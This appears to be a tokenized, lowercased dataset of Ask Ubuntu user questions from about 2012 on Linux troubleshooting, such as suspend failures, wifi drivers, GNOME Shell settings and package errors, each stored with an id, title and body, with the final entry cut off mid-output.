95678	ubuntu turns off instead of suspend / sleeping	i 'm using ubuntu 11.10 on my notebook as the main os . how ever , i 've been facing a serious problem : every time i try to suspend it , or it just stays idle for a while , the computer shuts down , instead of suspending . it actually seems to be suspended , but when i press the button the awake it , it turns on , the open works are all lost . how can i fix this ? p.s : on windows 7 the suspend / sleep resumes just fine . here is a complete list of hardware : 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 3 [ 8086:1c14 ] ( rev b4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm65 express chipset family lpc controller [ 8086:1c49 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 04 ) 01:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) 02:00.0 system peripheral [ 0880 ] : jmicron technology corp. sd/mmc host controller [ 197b:2382 ] ( rev 80 ) 02:00.2 sd host controller [ 0805 ] : jmicron technology corp. standard sd host controller [ 197b:2381 ] ( rev 80 ) 02:00.3 system peripheral [ 0880 ] : jmicron technology corp. ms host controller [ 197b:2383 ] ( rev 80 ) 02:00.5 ethernet controller [ 0200 ] : jmicron technology corp. jmc250 pci express gigabit ethernet controller [ 197b:0250 ] ( rev 03 ) i 've updated the kernel to 3.2 still and hibernate or suspend is still not working . swap is 1/4 of my ram .
95681	how do i run the latest version of `` ubuntu software center '' on 10.04 ?	i am new to ubuntu and juat install ubuntu 10.04 notebook version , and my question is can i update the software center to the one in 11.04 and stay in 10.04 thanks ,
95686	how to include a “show desktop” option in the alt-tab menu of gnome shell ?	this feature is present in windows vista and in the unity shell for ubuntu .
95692	multi-room / multi-zone diy audio setup	i have been searching around and trying to figure out the best way to create a multi-room multi-zoned setup on the relatively inexpensive side . this rules out a sonos or squeezebox based solution as they are both too expensive to implement . currently i am looking at using an alix3d3 found here board as it supports poe and has an stereo audio output removing the need for at least one power plug at the output source . ideally what i would like to be able to accomplish with this system is have 3 zones run by a board a piece pulling my music from my linux server . with these 3 zones i would like to be able to either play a different song in each zone or have a single song synced among the zones akin to sonos . i have played with mpd ( music player daemon ) which installs easily using the voyager-mpd linux install and works well for a single output at a time , but not multiple zones as far as i can tell . has anyone been able to accomplish something like this and are there instructions for diy ?
95693	does ubuntu support 3d monitors ?	a couple of manufacturers are coming out with 3d monitors , primarily useful in gaming . it looks to me like they broadly rely on proprietary windows drivers to work . am i right ? are there existing projects to get this kind of support in linux/ubuntu ? would this support happen at the kernel level , x.org/wayland level or drivers ? this is of course vitally important with the advent of 3d-capable tvs and ubuntu tv .
95695	how do i get an hp laserjet cp1025 color printer working ?	i have hplip 3.10.6 and it does n't show any driver for 'hp laserjet cp1025 color ' . is there a way to get the driver install ?
95699	update manager and sudo apt-get give the following message '' e : the method driver/usr/lib/apt/methods/http// could not be found	tried both the update manager and terminal , get the same message . removed and re-downloaded update manager , same message .
95707	aptitude unable to find dependencies , broken packages	i installed an ubuntu on a virtual machine 6 months ago . i never needed a ssh connection until now . but when i try to install sshd , i get this error : root @ onur-vmdesktop : /home/onur # apt-get install openssh-server reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openssh-server : depends : openssh-client ( = 1:5.3p1-3ubuntu3 ) but 1:5.3p1-3ubuntu5 is to be installed e : broken packages what can i do ?
95709	just installed 11.10 and windows 7 is now missing	after dual-booting ubuntu 11.10 successfully on another computer , i finally decided it was time for me to make the leap from windows 7 to ubuntu . however , the installation on my dell inspiron laptop did not go as smoothly as the hp laptop i installed ubuntu on previously . when i began to install ubuntu , i got past the screen where it checks that you have the laptop plugged-in , and internet connection and etc . the deviation from the previous installation came at this point . when i installed ubuntu last time , there was a partition tool and a recommended partition already established and i simply accepted , installed and within 30 minutes was able to boot into ubuntu and windows 7 , it was lovely ! this time , however , i selected âsomething different , â having that option and deleting the entire hard drive . i selected the 50 gb of free space and selected add partition . i even added a second partition for swap . installation continued smoothly and ubuntu came to life brilliantly . only problem was , windows 7 is nowhere to be found ... i am pretty sure i did not delete windows , but i can not see the windows partition under the disk check and it does not show up under grub . i have tried updating grub and using command lines to generate the grub list , but hd # 's are absent and root folders are just a series of letters and numbers . i am not that upset over losing windows , other than not having it available if i must use it as well as not being able to retrieve files . i appreciate any help .
95716	automatically adjust the volume based on content ?	in different audio sources the level of sounds are different . it 's very annoying to set the level of sound on almost every media content . sometimes , when before you had something quiet , you had to adjust it more louder and after some time you want to play another media - bang ! it unexpectedly breaks your headphones , the sound is so loud ! so , is there some plugin/feature which can automatically adjust the level of sound on every media content ?
95719	can a backup created on a 32bit installation be restored onto a 64bit system after upgrade ?	can a backup created on a 32bit installation be restored onto a 64bit system after upgrade ? i 'm using deja dup as a backup with the default settings ( basically the home folder ) . i do n't have any `` special '' folders but would like to maintain the email history and settings ( thunderbird ) .
95720	is it possible to enable sound for login and logout ?	is it possible to enable sound for login and logout ( like windows ) in ubuntu 11.10 ?
95721	webcam support in pidgin for yahoo ! protocol ?	today i reinstalled ubuntu and i 'm using yahoo ! messenger under pidgin . i do n't know if it supports video chat . does pidgin have webcam support when connected to yahoo ! ?
95722	how to change color in kolourpaint ?	there is n't any toolbar to change line/pencil color . how to add the toolbar ? i have installed kolourpaint from default ubuntu repositories .
95726	is it possible to ssh my ubuntu machine from an iphone ?	i want to control my ubuntu machine by ssh ( or something similar ) from my iphone . is this possible ?
95728	how to shut down my computer ?	i ca n't find a dialogue anywhere on the desktop ( like on windows start/shutdown ) to shut down ubuntu . i downloaded and ran the ubuntu live cd and after i ran it , i could n't shut it down . i had to hold the on/off key on my computer for 4 seconds to shut down my computer to get back into windows . if there is a button somewhere , why is it not obvious ?
95730	why does my computer get stuck on the shut down screen ?	when i shut down my computer it always gets stucks on the shut down screen ( where it displays the ubuntu logo and the little dots ) . i tried to shut it down through shell , i checked the init . process , shell and everything . i ca n't find out where the problem is ! i tried to shut down through terminal session and still the same problem . i have to shut down with power button every single time . anyone got a solution ?
95734	how can i connect applications running with wine to the internet ?	i ca n't get internet accesson something like internet download manager , no errors or anything but it just wo n't connect . and how to integrate wine applications with native running applications like opera ?
95738	is ubuntu better on battery than other os 's ?	nothing really to say here , except it would be cool to get some examples on what os 's might save me battery life and if you have any suggestions on apps that would save battery on ubuntu that would be awesome .
95739	marlin file manager does n't launch due to libunity.so.6 missing	i just installed marlin file browser , from the marlin-dev ppa . problem is , wehn i try to launch it , i get this error : stewart @ studiolaptop2 : ~ $ marlin marlin : error while loading shared libraries : libunity.so.6 : can not open shared object file : no such file or directory what should i do ? p.s . - i 've tried it in gnome-shell and unity , but get same error : (
95740	how can i get the message menu and other unity notification area widgets into my awesome wm panel ?	i 've just started using awesome wm , but i miss a lot of stuff from the unity panel : the logout buttons , the message menu , etc . is there a way to get these into the awesome wm panel ?
95743	is there going to be a way to get ubuntu tv on a normal tv ?	will there be a way to get all the features of an ubuntu tv onto a regular tv by hooking up a computer to your tv ?
95745	remote access my desktop through router	how can i remote access my computer desktop that is behind a router with my android tablet ?
95746	no action when shutdown pressed	my system : ubuntu 11.10 latest updates with custom gtk3 theme this is the output of .xsession-errors : warn 2012-01-15 21:44:04 glib.glib-gobject :0 invalid uninstantiatable type ( null ) ' in cast tobamfview' warn 2012-01-15 21:44:05 glib :0 unable to fetch children : method `` children '' with signature `` '' on interface `` org.ayatana.bamf.view '' does n't exist what can i do now to enable shutdown button ? if i press shutdown nothing happens .
95748	how do i remove ubuntu from a windows 7 machine without the recovery disk ?	i have a computer that originally came with windows 7 . i recently installed ubuntu 11.04 ( natty ) on it . now , i want to remove it from the computer while keeping windows . unfortunately , i do n't have the windows recovery disk anymore ... is there a way i can delete ubuntu without deleting the booting program ( the purple screen where you can select the operating system ) ?
95750	i ca n't get on the internet via a wireless connection	this computer , ( running ubuntu 11.10 oneiric ) i 'm writing from is connected to the inet via clearwire modem , to belkin n600 db wireless router ( ethernet cable ) . this router successfully connects via wireless to a laptop in this house . my problem is my computer ( dell dimension 4500 ) in an adjacent room is successfully connected ( by eth cable ) to a netgear n300 wireless router wnr2000 v2 , but i ca n't connect it , via wireless , to my belkin router . that computer does get inet access if i physically swap it to the same setup i have in this room .
95751	restore ubuntu-tweak from recover cd or external hd	i 've been trying to repair my system after it froze during a session using ubuntu-tweak . i 'm aware that it only saves the settings and not the files , so my question is : can i restore it from another hard-drive or live cd ? i 'm fairly new to linux , but i 'm gaining ground after getting `` greedy '' with all the possibilities included with the open source software . it 's part of my learning process . i break it , then i learn how to fix it ( sometimes ) . i 've searched to no avail for a solution so any help is appreciated . regards , jeremy
95753	convert lossless m4a to flac	i tried to convert a file with pacpl , but i get the well-known `` 256 '' error . with the -v flag , the faq of pacpl tells me : '' the file you are trying to convert is a lossless .m4a file . the format is not yet supported by faac/faad . '' since faac/faad seems to be used in every other converting tool on ubuntu , how can i successfully convert formats ?
95756	how do i show recently logged in users in gdm ?	all of our machines here access a directory server for most accounts , and have one local account ( well , plus all of the standard ones ) the login screen only ever shows the one local account ( 'nadmin ' ) , and , on the whole , wo n't show any other accounts . what i want is to be able to have any recently logged in accounts to be shown on that screen . strangely , on a couple of machines , there is one other user shown , but i have no idea how they ended up there . it does n't seem to be based around any kind of recent login . any idea how i can get this to work ?
95763	how can i configure the login screen to be displayed in portrait orientation ?	i just started using linux , and i have one question . i have a monitor that i rotated 90âś clockwise , so it , being rectangle shaped , is taller than it is wider . using the system settings in ubuntu , i set it up , and it works great , except the login screen and loading screen are not rotated right . they are rotated in the `` normal '' way . is this just a glitch , or is there some setting i overlooked ? i am using the open source drivers , and it is an ati card , if that matters .
95770	what is the best laptop for ubuntu 11.10 ?	i 'm a java , ruby developer and looking for a new laptop to use ubuntu on it . also , there have to be a good video . please advise .
95771	what should i do to use ubuntu one with different languages on different computers ?	i use the ubuntu one synchronization on different computers , where some are set in english and others set in french . therefore , i would have liked the 'music ' folder on the english-localized computer have the same content as the 'musique ' folder on the french-localized machine . what would you suggest me to do to achieve that ? notice that as far as the 'documents ' folder is concerned , i do n't encounter this problem , since the word is the same in both languages .
95773	how come firefox has no settings ?	i 've installed the latest ubuntu . i 'm using firefox and wanted to change some of the settings . but it has no menu and no where i can see to open the settings menu to change things . this is my first attempt at installing ubuntu proper and getting this far ; i.e . having a system working . i have tried several times since ubuntu was made . the install cd has come a long way and even does the partitioning for dual boot . so i commend all the programmers for that vast improvement . however it is things like this that are just most infuriating and off-putting when you come from widows to ubuntu : when you ca n't find even a menu to work with ! has anyone any idea how to view the menu on the firefox that comes with the installation 11.10 ?
95775	is it possible to view the contents of a debian package ?	i want to see the contents of a debian package , especially if the package is properly cleaning up whatever it installs . i want to also see how it goes about installing the software , what directories it creates , symbolic links etc .
95776	wifi keeps on going on/off on an hp pavillion g6 1b35	recently i bought this laptop hp g6 1b35 . it comes with windows 7 home premium . i installed ubuntu in it by erasing windows . ubuntu got installed correctly . but now when i turn my wifi switch on/off it switches between on/off very fast ( the light keeps dancing between orange ( off ) and white ( on ) very rapidly for sometime . then it stays white , but again the same dancing . here is the necessary information about my hardware and network lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 02:00.0 network controller : intel corporation centrino wireless-n 1000 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) sudo lshw -class network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 05 serial : 78 : e3 : b5 : ** : ** : ** size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=10.13.9.221 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:40 ioport:3000 ( size=256 ) memory : b0404000-b0404fff memory : b0400000-b0403fff *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 8c : a9:82:8d : f2:40 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-15-generic-pae firmware=39.31.5.1 build 35138 ip=142.244.143.130 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:42 memory : b4400000-b4401fff anyone ? ? ? thank you
95777	why do i get a `` liveconnectpermissionneeded access denied '' error when using java applets that record audio ?	i 'm using openjdk and the icedtea plugin for firefox . java applets generally work , but those trying to record audio are crashing with this error message : error on java side : liveconnectpermissionneeded access denied ( javax.sound.sampled.audiopermission record ) do i need to edit permissions ? i did not find where and how .
95781	symlink launcher icon not visible on unity launcher	i have created a symlink launcher icon on my desktop to open a program . when i set the icon for the symlink launcher it appears on the desktop but when i drag it onto the unity launcher the icon changes to the default spring icon . how do i get the icon to show in the unity launcher ? the icon i am using is a 24px x 24px png , does it need to be 256px x 256px instead ?
95783	how do i install opengl 4+ ?	i 've spent the past 3 days searching and ca n't find anything . i have an optimus setup with ironhide and a gt520m nvidia card ; how do i install the latest version of opengl ? i keep getting `` glx_arb_create_context_profile is unavailable '' when i try to run the program , because mesa implements an ancient library . $ glxinfo | grep `` opengl version '' $ opengl version string : 2.1 mesa 7.11 example : optirun ./assign1 * starting ironhide x server ironhide don enabling nvidia card succeeded . . [ ok ] opengl profile requested but glx_arb_create_context_profile is unavailable error : could not open window error : could not initialize ui . * stopping ironhide x server ironhide doff disabling nvidia card succeeded .
95785	what is vanilla ubuntu ?	i sometimes see the expression of vanilla ubuntu but i can not find what it means . what kind of version of ubuntu is vanilla ubuntu ?
95790	how to download video from web page ?	i 'm learning how to program and i want to know how to download a video from a web page . i do n't want to use software to do it for me , i want to make it myself . i was thinking that i could get the video element 's id and then download it , but i 'm stuck as i do n't know much about html or web design .
95795	screen cuts off part of grub on boot	i 've recently installed ubuntu 11.10 on my windows 7 desktop computer ( on a seperate partition ) everything has gone smoothly except when i restart the computer and grub 's loader screen shows , part of the screen gets cut off.. but once ive selected a boot option and hit enter , the screen readjusts to fill the entire monitor properly . so my question is , is there a way i can correct this ? kind of annoying not being able to see the full boot option
95796	only close button shows up in google chrome in gnome shell	after i installed the gnome shell in ubuntu , i decided that i did n't like having the `` close/minimize/maximize '' buttons on the right , so i switched them over to the left using gconftool-2 -- set `` /apps/metacity/general/button_layout '' -- type string `` close , minimize , maximize : '' after resetting the shell , however , i found that with the gtk+ theme , only the close button shows up . using system title bar and borders will make all the buttons appear , but i really want to use the theme because the system title bar makes the top bar too thick . logging out and back in did n't fix it , and i tried reinstalling chrome , but the problem persists .
95798	how do i get the super key working properly in emacs ?	i 'm using ubuntu 10.04 lts with emacs 23 . when i am in org-mode and i hold down control , windows key and hit return , i see : '' c-s-return is undefined '' in org-mode it tells me that c-s-ret will insert a new todo entry which is what i want . how do i get the super key to work properly ? ( assuming that is the problem - not sure why its displaying the small s rather than the capital but i am guessing that is something to do with it ) .
95799	changing symlinks does not work for directories	in order to change a symbolic link , one can use the -fs option to eliminate the need to unlink or delete the old link first . however , trying to do so on directories does not seem to work : $ mkdir dir1 $ mkdir dir2 $ ln -s dir1 lnk $ ln -sf dir2 lnk $ ll ... ... ... lnk - > dir1 $ why so ? is there another option to do this with directories the same as with files ?
95800	tildes not displaying properly on gnome shell	i 've been using gnome shell for a long while , and still ca n't find a fix for this . there are certain fonts ( like roboto , lucida grande , among others ) displaying tildes wrong , also with eñes ( n with a hypen : p ) for example : expected configuraci ó n - some sentence with the e ñ e letter showed configuraci 'o n - some sentence with the e ~n e letter . i searched forums a bit , but since this problem is n't showing up on english machines , then i could n't get any specific fix . any ideas ? thanks !
95806	can i upgrade to 11.10 on my ppc 10.04 ?	i have 10.04 installed on my macmini powerpc , i was thinking about upgrading to 11.10 , can i do this through an update or do i have to find and download a community supported iso file ?
95812	how can i rotate my display in the most easy way ?	i am the lucky owner of a pivot monitor , which screen can be rotated ( physically ) . what is the easiest way to make my display turn when i turn my monitor ? for the moment i first launch the 'displays ' app , and then change the settings and confirm . but this is in fact quite a laboured procedure , since i want to switch my orientation up to a few times per minute . so is there an indicator for this , or equivalent ? can i set a keyboard shortcut that would launch a dedicated command ? in fact i am thinking of something similar to the windows program irotate .
95813	how can i reset the gnome shell theme for the main account from the guest account ?	i tried out a gnome shell theme from gnome-look.org on my main account/login user . the theme must be broken because it wo n't load , and crashes that login . i am currently on the guest account . is there any way to edit that account 's theme to default from this account ?
95814	how do i make gapless audio work when using the mplayer audio output on gmusicbrowser ?	first i uninstalled mplayer and replaced it with mplayer2 since it is supposedly capable of gapless playback . now i know gtstreamer can do gapless but some of my files have glitches when using the gtstreamer option in the audio preferences of gmusicbrowser which is why i am using the mplayer option instead . now what exactly do i put in the options box to make playback gapless on gmusicbrowser using mplayer2 ?
95816	do i need to be concerned about browser security ?	i have been a long time windows user till about thanksgiving when i switched to ubuntu . on windows i used firefox because i could trust the security that it gave . since malware/virus are next to none on ubuntu ( and yes i have read up on all of the diffent point of views on both sides of having ubuntu security software or not ) is google chrome just as safe on linux or should i stick with firefox ?
95817	how to successfully restart a network without reboot ?	when i am using ubuntu , sometimes the network goes down and there is no option to bring back the wired network . there is always option for wireless , but no option for wired network . in such case i try sudo service network-manager restart ( using a command line just to start the interface ) . this works sometimes , sometimes it takes many iterations and other times it never starts . in my country the network goes down without any reason . i even wrote a perl script to run above script for at least 10 iterations and scheduled it using cron . since lately i can not start the network using above command unless i restart the computer . what is the problem with the computer , why ca n't a network restart become a first class citizen in ubuntu and needs a computer reboot . why is n't there an option that never goes down just like wireless network to start wired network . is there something i am missing . the command sudo /etc/init.d/networking restart does not seem to do anything at all .
95833	problem with hibernate on ubuntu 11.10 slow	i installed ubuntu 11.10 on my machine and i notice several problems with the hibernate functionality . when i use s2disk/pm-hibernate , i see an embarrassingly slow wakeup from the hibernate state . i am talking on the order of 5-6 minutes when windows 7 on the same system resumes within 1 minute even when i hibernate with a slightly loaded system . but this slow resume from hibernate is unacceptable and i would be glad if someone can help me repair it . i have a core i5 processor with 8gb ram . i have set about 6gb of hard disk space for swap . it would be helpful if someone can help me identify and rectify the bottleneck in the resume process . also with windows 7 i was able to setup my system to wake up from hibernate state automatically at a specified time . but i am not able to get the same functionality running on linux . i am following this automatic system wakeup guide . thanks for your help ! update : interesting observation from /var/log/kern.log during s2disk stage : i see the following log message : jan 16 01:38:00 pc kernel : [ 10682.575070 ] pm : preallocating image memory ... done ( allocated 1902274 pages ) jan 16 01:38:00 pc kernel : [ 10706.894027 ] pm : allocated 7609096 kbytes in 24.33 seconds ( 312.74 mb/s ) this seems to be the bottleneck of s2disk stage . during resume the only time consuming steps as per kern.log are : jan 16 01:38:01 pc kernel : [ 10709.361876 ] video lnxvideo:00 : restoring backlight state jan 16 01:38:13 pc kernel : [ 10726.919537 ] wlan0 : authenticate with c0 : c1 : c0 : f0:68:6b ( try 1 ) this takes 12 seconds . jan 16 01:38:15 pc kernel : [ 10728.620666 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id jan 16 01:38:17 pc kernel : [ 10730.903990 ] wlan0 : deauthenticated from * : * : * : * : *:6b ( reason : 15 ) this takes 2 seconds . jan 16 01:38:17 pc kernel : [ 10730.967287 ] cfg80211 : calling crda to update world regulatory domain jan 16 01:38:19 pc kernel : [ 10732.265611 ] wlan0 : authenticate with * : * : * : * : *:6b ( try 1 ) this takes 2 seconds . jan 16 01:38:19 banga-pc kernel : [ 10732.271086 ] wlan0 : associated jan 16 01:38:35 banga-pc kernel : [ 10748.866054 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain jan 16 01:38:35 banga-pc kernel : [ 10748.866063 ] cfg80211 : world regulatory domain updated : this takes 16 seconds . rest all the log messages are closely spaced in time . this does not explain the 5-6 minute resume time . also after about 2 minutes of power on i do see the windows and everything but the system takes about 3-4 minutes to become usable . until then i do not see the mouse pointer and the keyboard does not work . the screen remains frozen until then as if waiting on sudo s2disk i had issued before hibernating the system . strange but i do need help to fix this soon . i am used to < 30 seconds resume time and restarting my computer < once per week . i would be delighted if i could get the same with ubuntu . i also need help to fix the acpi wakeup thing i mentioned above . in case it matters i have an integrated intel graphics card on my laptop .
95838	ubuntu after boot shows a black screen with a warning reboot required	i installed ubuntu in my system already having windows xp using wubi.. after the rebooting i selected ubuntu and a black screen appears with a message stack : 49 59 aa and stops thr and does not boot it is also telling it has changed to text console due to error and it hangs ... . my keyboard does not work after that . what should i do ?
95839	11.10 desktop alerts ( volume change and terminal bell ) stopped working but all other audio still works	all , my sound works just fine in 11.10 64-bit install on hp dm1-4050 sandy bridge notebook ( e.g . audio works in banshee , flash , games , browser , thunderbird email notification , etc . ) , but the core desktop notifications ( e.g . pressing a tab in a terminal where there is more than one option should trigger a terminal bell , or changing volume using volume keys should be accompanied with the supporting `` quack '' that the volume app makes ) do not work . i 've intentionally disabled login sound as explained here on ask ubuntu but even enabling it back makes no difference . these notifications did work before just fine and i am not sure when did the actually stop working but it must 've been fairly recently . only things i did were trying to install some ppa edge xorg drivers for my intel card ( a separate issue ) but also reverted them all with ppa-purge once i discovered they did not improve anything . other thing i did was check volume settings with alsamixer and did alsactl store for the soundcard after i did some experimenting with volume settings for pcm ( on my laptop pcm at 100 % crackles so i had to lower it and make pulseaudio ignore its setting as per ask ubuntu 's page ) . that said , neither of these should have any bearing on the said notifications since the volume is up and they clearly work everywhere else but the core desktop events . the system ready drum sound when ubuntu boots and user reaches the login screen also does not work . the guest login behaves exactly same as mine . audio works ( including the login sound since i 've not disabled it for the guest account ) , but no quacks when changing the volume or terminal bell sounds ... i 've tried copying ubuntu sounds to /usr/share/sounds/ as suggested on ask ubuntu and that did not work . i also tried using dconf-editor to check sound theme settings and tried both freedesktop ( which is what it was set to ) and ubuntu , as suggested on ask ubuntu . this did not work either . i tried purging the ~/.pulse folder and the /tmp/*pulse* entries , rebooting and restarting pulseaudio with -d flag . while audio came back on and behaved just fine in all aspects ( e.g . one can adjust volume levels , play music , games , in-browser sound stuff , and other app alerts ) except for the system ready drum sound ( at the login screen ) , and any system event ( terminal bell and volume change quack sound ) . it is interesting that the quack sound works inside system settings- > sound when adjusting levels there , but it does not when volume is changed via top bar 's volume settings ... i do recall that at one point yesterday when i was restarting pulseaudio the quacks that accompany volume change did start working but i have no idea what caused that . this was also when i first realized those alerts were not working . after rebooting it was again gone . i did compile my own 3.0.14-rt31 kernel a little while ago as instructed on one of the wiki 's for the 11.10 rt kernel . everything works as before except for the said sound alerts . i am not sure if this began happening since i started using the rt kernel though and yesterday 's momentary ability to hear those quacks while changing the volume make me believe that the kernel is not one responsible for this problem . one more thing i can think of is that i used alsoft-conf tool to configure buffering on the openal ( due to ta spring 's choppy audio ) and changed in there default audio device to alsa . i also tried reverting it to pulseaudio as the only allowed output but the bottom part of the backend tab always reverts to alsa even when i select pulseaudio . the pulseaudio does remain as the only active choice on top . this , however , once again does not make any sense in terms of preventing desktop audio alerts when everything else including openal games plays sound just fine ... so , there you have it , as verbose as i could make it : - ) . i tried all i could find on this issue and had no luck so far ... any ideas ?
95847	what is the rationale for where exactly `` ubuntu '' is placed in the browser user agent string ?	firefox has `` ubuntu '' placed just before `` x11 '' while chromium has it placed later on in the string ( after `` ( khtml , like gecko ) '' ) . there have been instances of web sites not recognizing firefox only when the distro is ubuntu : in two cases ( http : //www.summitracing.com/ and http : //translink.com.au/ ) , it appears that the web master fixed the issue somehow . the third instance ( http : //www.property24.com/ ) was n't yet fixed when i last checked . in the first and third cases , the page concerned did n't open and users were asked to download something like `` mobile.aspx '' . in the second case , users got mark-up meant for mobile platforms . users of other linux distros did n't have problems and those using a version of firefox downloaded directly from mozilla did n't have a problem either . users of chromium on ubuntu did n't have the problem either . at the time of posting , http : //www.property24.com/ still offers to download mobile.aspx and does n't open the page correctly if `` ubuntu '' is present ahead of `` x11 '' . if i tweak the user agent string to mozilla/5.0 ( x11 ; linux i686 ; rv:11.0a2 ) gecko/20120114 , ubuntu , firefox/11.0a2 , the page loads without issue . the issue with http : //www.property24.com/ is discussed here as pointed out by ocky over here . the `` summitracing '' issue was reported here . edit : bug 89774 relates to issues arising from introduction of `` ubuntu '' into the ua string . a `` patched '' beta firefox is available for testing . details of the ppa are available at chris coulson 's blog .
95848	how to transfer installed programs to other pc	my ubuntu laptop is customised with all the programs and themes of my choise , can i transfer these software to another computer running ubuntu and install them there via usb drive .
95849	kde 4.7.3 : how to remember ssh key passphrase in konsole ?	i am using latest kde in kubuntu 11.10 , i have ssh keys added protected by a passphrase which is prompted every time i try to establish ssh connection . in gnome it would pop up a gui window where i entered this passphrase once after login , and it never asked for it later on . how can i make kde remember my passphrase ?
95851	why wo n't the application menu appear in gnome panel ?	in gnome fallback mode , the application launcher menu that is supposed to be in the top left corner is missing . here 's a picture : how do i get that menu to appear ?
95852	how to fix bcm4312 driver problem ?	i have a dell laptop on which wireless is giving me problems.the card some times is detected and some times the card could not be detected.i noticed this problem started since i did suspend and resume of my laptop . so i unistalled the broadcomm sta driver and installed b43 then also things did not worked as expected.in a series of installation and unistallations of the wireless driver here things have got hotch potch . the network icon on top right hand corner does not shows an option of wireless network . lspci -vnn shows following 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] flags : fast devsel , irq 17 memory at f6900000 ( 64-bit , non-prefetchable ) [ disabled ] [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information : len=78 < ? > capabilities : [ e8 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 13c ] virtual channel capabilities : [ 16c ] power budgeting < ? > kernel modules : ssb my specifications cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' uname -a linux rin 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux lspci -nnk | grep -ia2 net -- 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] kernel modules : ssb rfkill list 